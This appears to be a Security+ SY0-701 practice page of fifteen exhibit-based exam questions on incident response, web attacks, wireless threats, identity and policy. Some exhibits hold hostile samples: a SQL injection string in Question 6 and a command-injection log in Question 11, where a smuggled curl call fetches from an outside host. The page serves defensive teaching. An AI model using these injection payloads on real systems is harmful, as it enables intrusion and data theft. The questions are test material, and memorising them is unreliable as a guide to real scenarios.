Back to Security+ SY0-701 questions

Scenario-based practice

Refer to the Exhibit Practice Questions

Practise Security+ SY0-701 practice questions — original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

15
scenario questions
SY0-701
exam code
CompTIA
vendor

Scenario guide

How to approach refer to the exhibit practice questions

Practise exhibit-style questions that ask you to read a topology, table, command output or diagram before choosing the best answer.

Quick answer

Exhibit-style questions test whether you can read a topology, command output, diagram or table before choosing the best answer.

How to extract the relevant detail from an exhibit.

How topology, command output or routing information affects the answer.

How to avoid answering from memory before reading the evidence.

How to map the exhibit back to the exam objective.

Related practice questions

Related SY0-701 topic practice pages

Scenario questions usually connect to one or more exam topics. Use these links to review the underlying concepts behind the scenario.

Practice set

Practice scenarios

Question 1hardmultiple choice
Full question →

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction
Question 2hardmultiple choice
Read the full VPN explanation →

Based on the exhibit, what additional control is the best fit?

Current controls on the finance share: - SMB signing enabled - Weekly access review - Nightly backups to immutable storage - Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive. Goal: detect unauthorized bulk access quickly before exfiltration completes.

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.
Question 3mediummultiple choice
Full question →

Based on the exhibit, what is the best next control to prevent noncompliant mobile devices from accessing corporate email while still allowing IT to wipe company data from lost phones?

Exhibit

MDM dashboard excerpt:
- iOS device compliance: 84%
- Android device compliance: 79%
- Email app access policy: Allow if credentials are valid
- Noncompliance reasons: outdated OS, no passcode, jailbreak/root indicators
- Lost device action: Full factory reset only

Security request:
Block risky devices from email access and protect employee personal data on BYOD devices.
Question 4mediummultiple choice
Full question →

Based on the exhibit, what is the best response to the facilities manager's request?

Exhibit

Corporate privacy notice excerpt:
- Employee home addresses, personal phone numbers, and emergency contacts are collected for payroll, benefits, tax reporting, and emergency notification only.
- Access is limited to HR and Payroll unless a privacy review approves another purpose.

Ticket:
- Facilities manager requests an export of all employee home addresses and personal phone numbers to mail holiday gifts and parking passes.
Question 5hardmultiple choice
Full question →

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'
Question 6mediummultiple choice
Full question →

Based on the exhibit, what type of web attack is most likely taking place?

Exhibit

Web application log excerpt:

Request: GET /search?q=acme' OR '1'='1'-- HTTP/1.1
Response: 500 Internal Server Error
Database log: syntax error near "OR" at line 1
Developer note: the search feature appends user input directly into the SQL query string without parameterization.
Question 7easymultiple choice
Read the full wireless explanation →

Based on the exhibit, what wireless threat is most likely occurring?

Exhibit

Wireless scan from the lobby:
SSID: CorpWiFi       BSSID: 18:AA:10:22:44:60  Signal: -78 dBm
SSID: CorpWiFi       BSSID: 7C:22:90:11:33:AA  Signal: -41 dBm
SSID: CorpGuest      BSSID: 18:AA:10:22:44:61  Signal: -79 dBm
User report: "My tablet connected to CorpWiFi automatically, then a sign-in page appeared that looked different from our normal one."
Question 8mediummultiple choice
Full question →

Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?

Exhibit

SaaS sign-in settings:
- Local accounts: Enabled
- SAML SSO: Disabled
- SCIM provisioning: Disabled
- Password synchronization: Disabled
Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.
Question 9easymultiple choice
Full question →

Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?

Exhibit

EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
Question 10mediummultiple choice
Full question →

Based on the exhibit, which change would most improve the security of the stored password data?

Exhibit

Database sample

users.password_hash
--------------------------------
alex   5f4dcc3b5aa765d61d8327deb882cf99
mira   202cb962ac59075b964b07152d234b70
sam    098f6bcd4621d373cade4e832627b4f6

Developer note:
- Passwords are hashed before storage
- The application does not currently store any salt values
Question 11hardmultiple choice
Full question →

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55
Question 12mediummultiple choice
Full question →

Based on the exhibit, what type of malware is the most likely issue on the workstation?

Exhibit

Help desk incident notes:

- User installed a free video converter from an unofficial download site.
- Browser home page changed without permission.
- A new extension appeared named "QuickSearch Helper".
- Outbound traffic to tracking.example-cdn.net increased every few minutes.
- The endpoint security console reports that saved browser cookies were accessed by an unknown process.
Question 13mediummultiple choice
Full question →

Based on the exhibit, which control should be enabled to mitigate this issue?

Exhibit

Packet Capture Summary
Host 10.20.30.44 sends repeated ARP replies:
  "10.20.30.1 is at 00:11:22:33:44:55"
  "10.20.30.1 is at 00:11:22:33:44:55"
Switch logs:
  DHCP snooping: disabled
  ARP inspection: disabled
Users report intermittent gateway connectivity and traffic sent to the wrong MAC address.
Question 14hardmultiple choice
Full question →

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

Exhibit

Current document excerpt:
- Managers may approve external file sharing by email.
- Employees should keep the approval email in their inbox.
- Help desk records exceptions if time allows.
Audit note:
- No consistent evidence of approval or exception retention was found across departments.
Management objective:
- External sharing exceptions must be approved, retained, and auditable in a consistent way.
Question 15hardmultiple choice
Full question →

Based on the exhibit, what is the best next step before the hotfix is released?

Exhibit

Emergency change request CHG-8841
Service: Customer portal login API
Reason: critical authentication bug causing lockouts

Pipeline status:
- Code review: pending
- Automated unit tests: skipped to save time
- Integration tests: failed once and were not rerun
- Rollback plan: not documented
- Approval: verbal yes from operations supervisor
- Deployment window: 21:30-22:00 tonight

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.